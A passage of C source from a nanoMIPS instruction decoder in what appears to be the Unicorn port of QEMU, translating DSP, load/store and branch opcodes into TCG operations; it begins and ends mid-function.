gen_helper_mulq_rs_ph(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_MULQ_S_PH: check_dsp_r2(ctx); gen_helper_mulq_s_ph(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_MULQ_RS_W: check_dsp_r2(ctx); gen_helper_mulq_rs_w(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_MULQ_S_W: check_dsp_r2(ctx); gen_helper_mulq_s_w(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_APPEND: check_dsp_r2(ctx); gen_load_gpr(tcg_ctx, t0, rs); if (rd != 0) { tcg_gen_deposit_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], t0, tcg_ctx->cpu_gpr[rt], rd, 32 - rd); } tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[rt]); break; case NM_MODSUB: check_dsp(ctx); gen_helper_modsub(tcg_ctx, v1_t, v1_t, v2_t); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_SHRAV_R_W: check_dsp(ctx); gen_helper_shra_r_w(tcg_ctx, v1_t, v1_t, v2_t); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_SHRLV_PH: check_dsp_r2(ctx); gen_helper_shrl_ph(tcg_ctx, v1_t, v1_t, v2_t); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_SHRLV_QB: check_dsp(ctx); gen_helper_shrl_qb(tcg_ctx, v1_t, v1_t, v2_t); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_SHLLV_QB: check_dsp(ctx); gen_helper_shll_qb(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_SHLLV_S_W: check_dsp(ctx); gen_helper_shll_s_w(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_SHILO: check_dsp(ctx); { TCGv tv0 = tcg_temp_new(tcg_ctx); TCGv tv1 = tcg_temp_new(tcg_ctx); int16_t imm = extract32(ctx->opcode, 16, 7); tcg_gen_movi_tl(tcg_ctx, tv0, rd >> 3); tcg_gen_movi_tl(tcg_ctx, tv1, imm); gen_helper_shilo(tcg_ctx, tv0, tv1, tcg_ctx->cpu_env); } break; case NM_MULEQ_S_W_PHL: check_dsp(ctx); gen_helper_muleq_s_w_phl(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_MULEQ_S_W_PHR: check_dsp(ctx); gen_helper_muleq_s_w_phr(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_MUL_S_PH: check_dsp_r2(ctx); switch (extract32(ctx->opcode, 10, 1)) { case 0: /* MUL_PH */ gen_helper_mul_ph(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; case 1: /* MUL_S_PH */ gen_helper_mul_s_ph(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; } break; case NM_PRECR_QB_PH: check_dsp_r2(ctx); gen_helper_precr_qb_ph(tcg_ctx, v1_t, v1_t, v2_t); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_PRECRQ_QB_PH: check_dsp(ctx); gen_helper_precrq_qb_ph(tcg_ctx, v1_t, v1_t, v2_t); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_PRECRQ_PH_W: check_dsp(ctx); gen_helper_precrq_ph_w(tcg_ctx, v1_t, v1_t, v2_t); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_PRECRQ_RS_PH_W: check_dsp(ctx); gen_helper_precrq_rs_ph_w(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_PRECRQU_S_QB_PH: check_dsp(ctx); gen_helper_precrqu_s_qb_ph(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_SHRA_R_W: check_dsp(ctx); tcg_gen_movi_tl(tcg_ctx, t0, rd); gen_helper_shra_r_w(tcg_ctx, v1_t, t0, v1_t); gen_store_gpr(tcg_ctx, v1_t, rt); break; case NM_SHRA_R_PH: check_dsp(ctx); tcg_gen_movi_tl(tcg_ctx, t0, rd >> 1); switch (extract32(ctx->opcode, 10, 1)) { case 0: /* SHRA_PH */ gen_helper_shra_ph(tcg_ctx, v1_t, t0, v1_t); gen_store_gpr(tcg_ctx, v1_t, rt); break; case 1: /* SHRA_R_PH */ gen_helper_shra_r_ph(tcg_ctx, v1_t, t0, v1_t); gen_store_gpr(tcg_ctx, v1_t, rt); break; } break; case NM_SHLL_S_PH: check_dsp(ctx); tcg_gen_movi_tl(tcg_ctx, t0, rd >> 1); switch (extract32(ctx->opcode, 10, 2)) { case 0: /* SHLL_PH */ gen_helper_shll_ph(tcg_ctx, v1_t, t0, v1_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, rt); break; case 2: /* SHLL_S_PH */ gen_helper_shll_s_ph(tcg_ctx, v1_t, t0, v1_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, rt); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case NM_SHLL_S_W: check_dsp(ctx); tcg_gen_movi_tl(tcg_ctx, t0, rd); gen_helper_shll_s_w(tcg_ctx, v1_t, t0, v1_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, rt); break; case NM_REPL_PH: check_dsp(ctx); { int16_t imm; imm = sextract32(ctx->opcode, 11, 11); imm = (int16_t)(imm << 6) >> 6; if (rt != 0) { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], dup_const(MO_16, imm)); } } break; default: generate_exception_end(ctx, EXCP_RI); break; } } static int decode_nanomips_32_48_opc(CPUMIPSState *env, DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint16_t insn; uint32_t op; int rt, rs, rd; int offset; int imm; insn = cpu_lduw_code(env, ctx->base.pc_next + 2); ctx->opcode = (ctx->opcode << 16) | insn; rt = extract32(ctx->opcode, 21, 5); rs = extract32(ctx->opcode, 16, 5); rd = extract32(ctx->opcode, 11, 5); op = extract32(ctx->opcode, 26, 6); switch (op) { case NM_P_ADDIU: if (rt == 0) { /* P.RI */ switch (extract32(ctx->opcode, 19, 2)) { case NM_SIGRIE: default: generate_exception_end(ctx, EXCP_RI); break; case NM_P_SYSCALL: if ((extract32(ctx->opcode, 18, 1)) == NM_SYSCALL) { generate_exception_end(ctx, EXCP_SYSCALL); } else { generate_exception_end(ctx, EXCP_RI); } break; case NM_BREAK: generate_exception_end(ctx, EXCP_BREAK); break; case NM_SDBBP: if (is_uhi(extract32(ctx->opcode, 0, 19))) { // gen_helper_do_semihosting(tcg_ctx, tcg_ctx->cpu_env); } else { if (ctx->hflags & MIPS_HFLAG_SBRI) { generate_exception_end(ctx, EXCP_RI); } else { generate_exception_end(ctx, EXCP_DBp); } } break; } } else { /* NM_ADDIU */ imm = extract32(ctx->opcode, 0, 16); if (rs != 0) { tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[rs], imm); } else { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], imm); } tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[rt]); } break; case NM_ADDIUPC: if (rt != 0) { offset = sextract32(ctx->opcode, 0, 1) << 21 | extract32(ctx->opcode, 1, 20) << 1; target_long addr = addr_add(ctx, ctx->base.pc_next + 4, offset); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], addr); } break; case NM_POOL32A: switch (ctx->opcode & 0x07) { case NM_POOL32A0: gen_pool32a0_nanomips_insn(env, ctx); break; case NM_POOL32A5: { int32_t op1 = extract32(ctx->opcode, 3, 7); gen_pool32a5_nanomips_insn(ctx, op1, rd, rs, rt); } break; case NM_POOL32A7: switch (extract32(ctx->opcode, 3, 3)) { case NM_P_LSX: gen_p_lsx(ctx, rd, rs, rt); break; case NM_LSA: /* * In nanoMIPS, the shift field directly encodes the shift * amount, meaning that the supported shift values are in * the range 0 to 3 (instead of 1 to 4 in MIPSR6). */ gen_lsa(ctx, OPC_LSA, rd, rs, rt, extract32(ctx->opcode, 9, 2) - 1); break; case NM_EXTW: gen_ext(ctx, 32, rd, rs, rt, extract32(ctx->opcode, 6, 5)); break; case NM_POOL32AXF: gen_pool32axf_nanomips_insn(env, ctx); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case NM_P_GP_W: switch (ctx->opcode & 0x03) { case NM_ADDIUGP_W: if (rt != 0) { offset = extract32(ctx->opcode, 0, 21); gen_op_addr_addi(ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[28], offset); } break; case NM_LWGP: gen_ld(ctx, OPC_LW, rt, 28, extract32(ctx->opcode, 2, 19) << 2); break; case NM_SWGP: gen_st(ctx, OPC_SW, rt, 28, extract32(ctx->opcode, 2, 19) << 2); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case NM_P48I: { insn = cpu_lduw_code(env, ctx->base.pc_next + 4); target_long addr_off = extract32(ctx->opcode, 0, 16) | insn << 16; switch (extract32(ctx->opcode, 16, 5)) { case NM_LI48: check_nms(ctx); if (rt != 0) { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], addr_off); } break; case NM_ADDIU48: check_nms(ctx); if (rt != 0) { tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[rt], addr_off); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[rt]); } break; case NM_ADDIUGP48: check_nms(ctx); if (rt != 0) { gen_op_addr_addi(ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[28], addr_off); } break; case NM_ADDIUPC48: check_nms(ctx); if (rt != 0) { target_long addr = addr_add(ctx, ctx->base.pc_next + 6, addr_off); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], addr); } break; case NM_LWPC48: check_nms(ctx); if (rt != 0) { TCGv t0; t0 = tcg_temp_new(tcg_ctx); target_long addr = addr_add(ctx, ctx->base.pc_next + 6, addr_off); tcg_gen_movi_tl(tcg_ctx, t0, addr); tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], t0, ctx->mem_idx, MO_TESL); tcg_temp_free(tcg_ctx, t0); } break; case NM_SWPC48: check_nms(ctx); { TCGv t0, t1; t0 = tcg_temp_new(tcg_ctx); t1 = tcg_temp_new(tcg_ctx); target_long addr = addr_add(ctx, ctx->base.pc_next + 6, addr_off); tcg_gen_movi_tl(tcg_ctx, t0, addr); gen_load_gpr(tcg_ctx, t1, rt); tcg_gen_qemu_st_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_TEUL); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } break; default: generate_exception_end(ctx, EXCP_RI); break; } return 6; } case NM_P_U12: switch (extract32(ctx->opcode, 12, 4)) { case NM_ORI: gen_logic_imm(ctx, OPC_ORI, rt, rs, extract32(ctx->opcode, 0, 12)); break; case NM_XORI: gen_logic_imm(ctx, OPC_XORI, rt, rs, extract32(ctx->opcode, 0, 12)); break; case NM_ANDI: gen_logic_imm(ctx, OPC_ANDI, rt, rs, extract32(ctx->opcode, 0, 12)); break; case NM_P_SR: switch (extract32(ctx->opcode, 20, 1)) { case NM_PP_SR: switch (ctx->opcode & 3) { case NM_SAVE: gen_save(ctx, rt, extract32(ctx->opcode, 16, 4), extract32(ctx->opcode, 2, 1), extract32(ctx->opcode, 3, 9) << 3); break; case NM_RESTORE: case NM_RESTORE_JRC: gen_restore(ctx, rt, extract32(ctx->opcode, 16, 4), extract32(ctx->opcode, 2, 1), extract32(ctx->opcode, 3, 9) << 3); if ((ctx->opcode & 3) == NM_RESTORE_JRC) { gen_compute_branch_nm(ctx, OPC_JR, 2, 31, 0, 0); } break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case NM_P_SR_F: generate_exception_end(ctx, EXCP_RI); break; } break; case NM_SLTI: gen_slt_imm(ctx, OPC_SLTI, rt, rs, extract32(ctx->opcode, 0, 12)); break; case NM_SLTIU: gen_slt_imm(ctx, OPC_SLTIU, rt, rs, extract32(ctx->opcode, 0, 12)); break; case NM_SEQI: { TCGv t0 = tcg_temp_new(tcg_ctx); imm = extract32(ctx->opcode, 0, 12); gen_load_gpr(tcg_ctx, t0, rs); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t0, t0, imm); gen_store_gpr(tcg_ctx, t0, rt); tcg_temp_free(tcg_ctx, t0); } break; case NM_ADDIUNEG: imm = (int16_t) extract32(ctx->opcode, 0, 12); gen_arith_imm(ctx, OPC_ADDIU, rt, rs, -imm); break; case NM_P_SHIFT: { int shift = extract32(ctx->opcode, 0, 5); switch (extract32(ctx->opcode, 5, 4)) { case NM_P_SLL: if (rt == 0 && shift == 0) { /* NOP */ } else if (rt == 0 && shift == 3) { /* EHB - treat as NOP */ } else if (rt == 0 && shift == 5) { /* PAUSE - treat as NOP */ } else if (rt == 0 && shift == 6) { /* SYNC */ gen_sync(tcg_ctx, extract32(ctx->opcode, 16, 5)); } else { /* SLL */ gen_shift_imm(ctx, OPC_SLL, rt, rs, extract32(ctx->opcode, 0, 5)); } break; case NM_SRL: gen_shift_imm(ctx, OPC_SRL, rt, rs, extract32(ctx->opcode, 0, 5)); break; case NM_SRA: gen_shift_imm(ctx, OPC_SRA, rt, rs, extract32(ctx->opcode, 0, 5)); break; case NM_ROTR: gen_shift_imm(ctx, OPC_ROTR, rt, rs, extract32(ctx->opcode, 0, 5)); break; } } break; case NM_P_ROTX: check_nms(ctx); if (rt != 0) { TCGv t0 = tcg_temp_new(tcg_ctx); TCGv_i32 shift = tcg_const_i32(tcg_ctx, extract32(ctx->opcode, 0, 5)); TCGv_i32 shiftx = tcg_const_i32(tcg_ctx, extract32(ctx->opcode, 7, 4) << 1); TCGv_i32 stripe = tcg_const_i32(tcg_ctx, extract32(ctx->opcode, 6, 1)); gen_load_gpr(tcg_ctx, t0, rs); gen_helper_rotx(tcg_ctx, tcg_ctx->cpu_gpr[rt], t0, shift, shiftx, stripe); tcg_temp_free(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, shift); tcg_temp_free_i32(tcg_ctx, shiftx); tcg_temp_free_i32(tcg_ctx, stripe); } break; case NM_P_INS: switch (((ctx->opcode >> 10) & 2) | (extract32(ctx->opcode, 5, 1))) { case NM_INS: check_nms(ctx); gen_bitops(ctx, OPC_INS, rt, rs, extract32(ctx->opcode, 0, 5), extract32(ctx->opcode, 6, 5)); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case NM_P_EXT: switch (((ctx->opcode >> 10) & 2) | (extract32(ctx->opcode, 5, 1))) { case NM_EXT: check_nms(ctx); gen_bitops(ctx, OPC_EXT, rt, rs, extract32(ctx->opcode, 0, 5), extract32(ctx->opcode, 6, 5)); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case NM_POOL32F: gen_pool32f_nanomips_insn(ctx); break; case NM_POOL32S: break; case NM_P_LUI: switch (extract32(ctx->opcode, 1, 1)) { case NM_LUI: if (rt != 0) { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], sextract32(ctx->opcode, 0, 1) << 31 | extract32(ctx->opcode, 2, 10) << 21 | extract32(ctx->opcode, 12, 9) << 12); } break; case NM_ALUIPC: if (rt != 0) { offset = sextract32(ctx->opcode, 0, 1) << 31 | extract32(ctx->opcode, 2, 10) << 21 | extract32(ctx->opcode, 12, 9) << 12; target_long addr; addr = ~0xFFF & addr_add(ctx, ctx->base.pc_next + 4, offset); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], addr); } break; } break; case NM_P_GP_BH: { uint32_t u = extract32(ctx->opcode, 0, 18); switch (extract32(ctx->opcode, 18, 3)) { case NM_LBGP: gen_ld(ctx, OPC_LB, rt, 28, u); break; case NM_SBGP: gen_st(ctx, OPC_SB, rt, 28, u); break; case NM_LBUGP: gen_ld(ctx, OPC_LBU, rt, 28, u); break; case NM_ADDIUGP_B: if (rt != 0) { gen_op_addr_addi(ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[28], u); } break; case NM_P_GP_LH: u &= ~1; switch (ctx->opcode & 1) { case NM_LHGP: gen_ld(ctx, OPC_LH, rt, 28, u); break; case NM_LHUGP: gen_ld(ctx, OPC_LHU, rt, 28, u); break; } break; case NM_P_GP_SH: u &= ~1; switch (ctx->opcode & 1) { case NM_SHGP: gen_st(ctx, OPC_SH, rt, 28, u); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case NM_P_GP_CP1: u &= ~0x3; switch (ctx->opcode & 0x3) { case NM_LWC1GP: gen_cop1_ldst(ctx, OPC_LWC1, rt, 28, u); break; case NM_LDC1GP: gen_cop1_ldst(ctx, OPC_LDC1, rt, 28, u); break; case NM_SWC1GP: gen_cop1_ldst(ctx, OPC_SWC1, rt, 28, u); break; case NM_SDC1GP: gen_cop1_ldst(ctx, OPC_SDC1, rt, 28, u); break; } break; default: generate_exception_end(ctx, EXCP_RI); break; } } break; case NM_P_LS_U12: { uint32_t u = extract32(ctx->opcode, 0, 12); switch (extract32(ctx->opcode, 12, 4)) { case NM_P_PREFU12: if (rt == 31) { /* SYNCI */ /* * Break the TB to be able to sync copied instructions * immediately. */ ctx->base.is_jmp = DISAS_STOP; } else { /* PREF */ /* Treat as NOP. */ } break; case NM_LB: gen_ld(ctx, OPC_LB, rt, rs, u); break; case NM_LH: gen_ld(ctx, OPC_LH, rt, rs, u); break; case NM_LW: gen_ld(ctx, OPC_LW, rt, rs, u); break; case NM_LBU: gen_ld(ctx, OPC_LBU, rt, rs, u); break; case NM_LHU: gen_ld(ctx, OPC_LHU, rt, rs, u); break; case NM_SB: gen_st(ctx, OPC_SB, rt, rs, u); break; case NM_SH: gen_st(ctx, OPC_SH, rt, rs, u); break; case NM_SW: gen_st(ctx, OPC_SW, rt, rs, u); break; case NM_LWC1: gen_cop1_ldst(ctx, OPC_LWC1, rt, rs, u); break; case NM_LDC1: gen_cop1_ldst(ctx, OPC_LDC1, rt, rs, u); break; case NM_SWC1: gen_cop1_ldst(ctx, OPC_SWC1, rt, rs, u); break; case NM_SDC1: gen_cop1_ldst(ctx, OPC_SDC1, rt, rs, u); break; default: generate_exception_end(ctx, EXCP_RI); break; } } break; case NM_P_LS_S9: { int32_t s = (sextract32(ctx->opcode, 15, 1) << 8) | extract32(ctx->opcode, 0, 8); switch (extract32(ctx->opcode, 8, 3)) { case NM_P_LS_S0: switch (extract32(ctx->opcode, 11, 4)) { case NM_LBS9: gen_ld(ctx, OPC_LB, rt, rs, s); break; case NM_LHS9: gen_ld(ctx, OPC_LH, rt, rs, s); break; case NM_LWS9: gen_ld(ctx, OPC_LW, rt, rs, s); break; case NM_LBUS9: gen_ld(ctx, OPC_LBU, rt, rs, s); break; case NM_LHUS9: gen_ld(ctx, OPC_LHU, rt, rs, s); break; case NM_SBS9: gen_st(ctx, OPC_SB, rt, rs, s); break; case NM_SHS9: gen_st(ctx, OPC_SH, rt, rs, s); break; case NM_SWS9: gen_st(ctx, OPC_SW, rt, rs, s); break; case NM_LWC1S9: gen_cop1_ldst(ctx, OPC_LWC1, rt, rs, s); break; case NM_LDC1S9: gen_cop1_ldst(ctx, OPC_LDC1, rt, rs, s); break; case NM_SWC1S9: gen_cop1_ldst(ctx, OPC_SWC1, rt, rs, s); break; case NM_SDC1S9: gen_cop1_ldst(ctx, OPC_SDC1, rt, rs, s); break; case NM_P_PREFS9: if (rt == 31) { /* SYNCI */ /* * Break the TB to be able to sync copied instructions * immediately. */ ctx->base.is_jmp = DISAS_STOP; } else { /* PREF */ /* Treat as NOP. */ } break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case NM_P_LS_S1: switch (extract32(ctx->opcode, 11, 4)) { case NM_UALH: case NM_UASH: check_nms(ctx); { TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); gen_base_offset_addr(ctx, t0, rs, s); switch (extract32(ctx->opcode, 11, 4)) { case NM_UALH: tcg_gen_qemu_ld_tl(tcg_ctx, t0, t0, ctx->mem_idx, MO_TESW | MO_UNALN); gen_store_gpr(tcg_ctx, t0, rt); break; case NM_UASH: gen_load_gpr(tcg_ctx, t1, rt); tcg_gen_qemu_st_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_TEUW | MO_UNALN); break; } tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } break; case NM_P_LL: switch (ctx->opcode & 0x03) { case NM_LL: gen_ld(ctx, OPC_LL, rt, rs, s); break; case NM_LLWP: check_xnp(ctx); gen_llwp(ctx, rs, 0, rt, extract32(ctx->opcode, 3, 5)); break; } break; case NM_P_SC: switch (ctx->opcode & 0x03) { case NM_SC: gen_st_cond(ctx, rt, rs, s, MO_TESL, false); break; case NM_SCWP: check_xnp(ctx); gen_scwp(ctx, rs, 0, rt, extract32(ctx->opcode, 3, 5), false); break; } break; case NM_CACHE: check_cp0_enabled(ctx); if (ctx->hflags & MIPS_HFLAG_ITC_CACHE) { gen_cache_operation(ctx, rt, rs, s); } break; } break; case NM_P_LS_E0: switch (extract32(ctx->opcode, 11, 4)) { case NM_LBE: check_eva(ctx); check_cp0_enabled(ctx); gen_ld(ctx, OPC_LBE, rt, rs, s); break; case NM_SBE: check_eva(ctx); check_cp0_enabled(ctx); gen_st(ctx, OPC_SBE, rt, rs, s); break; case NM_LBUE: check_eva(ctx); check_cp0_enabled(ctx); gen_ld(ctx, OPC_LBUE, rt, rs, s); break; case NM_P_PREFE: if (rt == 31) { /* case NM_SYNCIE */ check_eva(ctx); check_cp0_enabled(ctx); /* * Break the TB to be able to sync copied instructions * immediately. */ ctx->base.is_jmp = DISAS_STOP; } else { /* case NM_PREFE */ check_eva(ctx); check_cp0_enabled(ctx); /* Treat as NOP. */ } break; case NM_LHE: check_eva(ctx); check_cp0_enabled(ctx); gen_ld(ctx, OPC_LHE, rt, rs, s); break; case NM_SHE: check_eva(ctx); check_cp0_enabled(ctx); gen_st(ctx, OPC_SHE, rt, rs, s); break; case NM_LHUE: check_eva(ctx); check_cp0_enabled(ctx); gen_ld(ctx, OPC_LHUE, rt, rs, s); break; case NM_CACHEE: check_nms_dl_il_sl_tl_l2c(ctx); gen_cache_operation(ctx, rt, rs, s); break; case NM_LWE: check_eva(ctx); check_cp0_enabled(ctx); gen_ld(ctx, OPC_LWE, rt, rs, s); break; case NM_SWE: check_eva(ctx); check_cp0_enabled(ctx); gen_st(ctx, OPC_SWE, rt, rs, s); break; case NM_P_LLE: switch (extract32(ctx->opcode, 2, 2)) { case NM_LLE: check_xnp(ctx); check_eva(ctx); check_cp0_enabled(ctx); gen_ld(ctx, OPC_LLE, rt, rs, s); break; case NM_LLWPE: check_xnp(ctx); check_eva(ctx); check_cp0_enabled(ctx); gen_llwp(ctx, rs, 0, rt, extract32(ctx->opcode, 3, 5)); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case NM_P_SCE: switch (extract32(ctx->opcode, 2, 2)) { case NM_SCE: check_xnp(ctx); check_eva(ctx); check_cp0_enabled(ctx); gen_st_cond(ctx, rt, rs, s, MO_TESL, true); break; case NM_SCWPE: check_xnp(ctx); check_eva(ctx); check_cp0_enabled(ctx); gen_scwp(ctx, rs, 0, rt, extract32(ctx->opcode, 3, 5), true); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; } break; case NM_P_LS_WM: case NM_P_LS_UAWM: check_nms(ctx); { int count = extract32(ctx->opcode, 12, 3); int counter = 0; offset = sextract32(ctx->opcode, 15, 1) << 8 | extract32(ctx->opcode, 0, 8); TCGv va = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); MemOp memop = (extract32(ctx->opcode, 8, 3)) == NM_P_LS_UAWM ? MO_UNALN : 0; count = (count == 0) ? 8 : count; while (counter != count) { int this_rt = ((rt + counter) & 0x1f) | (rt & 0x10); int this_offset = offset + (counter << 2); gen_base_offset_addr(ctx, va, rs, this_offset); switch (extract32(ctx->opcode, 11, 1)) { case NM_LWM: tcg_gen_qemu_ld_tl(tcg_ctx, t1, va, ctx->mem_idx, memop | MO_TESL); gen_store_gpr(tcg_ctx, t1, this_rt); if ((this_rt == rs) && (counter != (count - 1))) { /* UNPREDICTABLE */ } break; case NM_SWM: this_rt = (rt == 0) ? 0 : this_rt; gen_load_gpr(tcg_ctx, t1, this_rt); tcg_gen_qemu_st_tl(tcg_ctx, t1, va, ctx->mem_idx, memop | MO_TEUL); break; } counter++; } tcg_temp_free(tcg_ctx, va); tcg_temp_free(tcg_ctx, t1); } break; default: generate_exception_end(ctx, EXCP_RI); break; } } break; case NM_MOVE_BALC: check_nms(ctx); { TCGv t0 = tcg_temp_new(tcg_ctx); int32_t s = sextract32(ctx->opcode, 0, 1) << 21 | extract32(ctx->opcode, 1, 20) << 1; rd = (extract32(ctx->opcode, 24, 1)) == 0 ? 4 : 5; rt = decode_gpr_gpr4_zero(extract32(ctx->opcode, 25, 1) << 3 | extract32(ctx->opcode, 21, 3)); gen_load_gpr(tcg_ctx, t0, rt); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0); gen_compute_branch_nm(ctx, OPC_BGEZAL, 4, 0, 0, s); tcg_temp_free(tcg_ctx, t0); } break; case NM_P_BAL: { int32_t s = sextract32(ctx->opcode, 0, 1) << 25 | extract32(ctx->opcode, 1, 24) << 1; if ((extract32(ctx->opcode, 25, 1)) == 0) { /* BC */ gen_compute_branch_nm(ctx, OPC_BEQ, 4, 0, 0, s); } else { /* BALC */ gen_compute_branch_nm(ctx, OPC_BGEZAL, 4, 0, 0, s); } } break; case NM_P_J: switch (extract32(ctx->opcode, 12, 4)) { case NM_JALRC: case NM_JALRC_HB: gen_compute_branch_nm(ctx, OPC_JALR, 4, rs, rt, 0); break; case NM_P_BALRSC: gen_compute_nanomips_pbalrsc_branch(ctx, rs, rt); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case NM_P_BR1: { int32_t s = sextract32(ctx->opcode, 0, 1) << 14 | extract32(ctx->opcode, 1, 13) << 1; switch (extract32(ctx->opcode, 14, 2)) { case NM_BEQC: check_nms(ctx); gen_compute_branch_nm(ctx, OPC_BEQ, 4, rs, rt, s); break; case NM_P_BR3A: s = sextract32(ctx->opcode, 0, 1) << 14 | extract32(ctx->opcode, 1, 13) << 1; check_cp1_enabled(ctx); switch (extract32(ctx->opcode, 16, 5)) { case NM_BC1EQZC: gen_compute_branch_cp1_nm(ctx, OPC_BC1EQZ, rt, s); break; case NM_BC1NEZC: gen_compute_branch_cp1_nm(ctx, OPC_BC1NEZ, rt, s); break; case NM_BPOSGE32C: check_dsp_r3(ctx); { int32_t imm = extract32(ctx->opcode, 1, 13) | extract32(ctx->opcode, 0, 1) << 13; gen_compute_branch_nm(ctx, OPC_BPOSGE32, 4, -1, -2, imm); } break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case NM_BGEC: if (rs == rt) { gen_compute_compact_branch_nm(ctx, OPC_BC, rs, rt, s); } else { gen_compute_compact_branch_nm(ctx, OPC_BGEC, rs, rt, s); } break; case NM_BGEUC: if (rs == rt || rt == 0) { gen_compute_compact_branch_nm(ctx, OPC_BC, 0, 0, s); } else if (rs == 0) { gen_compute_compact_branch_nm(ctx, OPC_BEQZC, rt, 0, s); } else { gen_compute_compact_branch_nm(ctx, OPC_BGEUC, rs, rt, s); } break; } } break; case NM_P_BR2: { int32_t s = sextract32(ctx->opcode, 0, 1) << 14 | extract32(ctx->opcode, 1, 13) << 1; switch (extract32(ctx->opcode, 14, 2)) { case NM_BNEC: check_nms(ctx); gen_compute_branch_nm(ctx, OPC_BNE, 4, rs, rt, s); break; case NM_BLTC: if (rs != 0 && rt != 0 && rs == rt) { /* NOP */ ctx->hflags |= MIPS_HFLAG_FBNSLOT; } else { gen_compute_compact_branch_nm(ctx, OPC_BLTC, rs, rt, s); } break; case NM_BLTUC: if (rs == 0 || rs == rt) { /* NOP */ ctx->hflags |= MIPS_HFLAG_FBNSLOT; } else { gen_compute_compact_branch_nm(ctx, OPC_BLTUC, rs, rt, s); } break; default: generate_exception_end(ctx, EXCP_RI); break; } } break; case NM_P_BRI: { int32_t s = sextract32(ctx->opcode, 0, 1) << 11 | extract32(ctx->opcode, 1, 10) << 1; uint32_t u = extract32(ctx->opcode, 11, 7); gen_compute_imm_branch(ctx, extract32(ctx->opcode, 18, 3), rt, u, s); } break; default: generate_exception_end(ctx, EXCP_RI); break; } return 4; } static int decode_nanomips_opc(CPUMIPSState *env, DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; 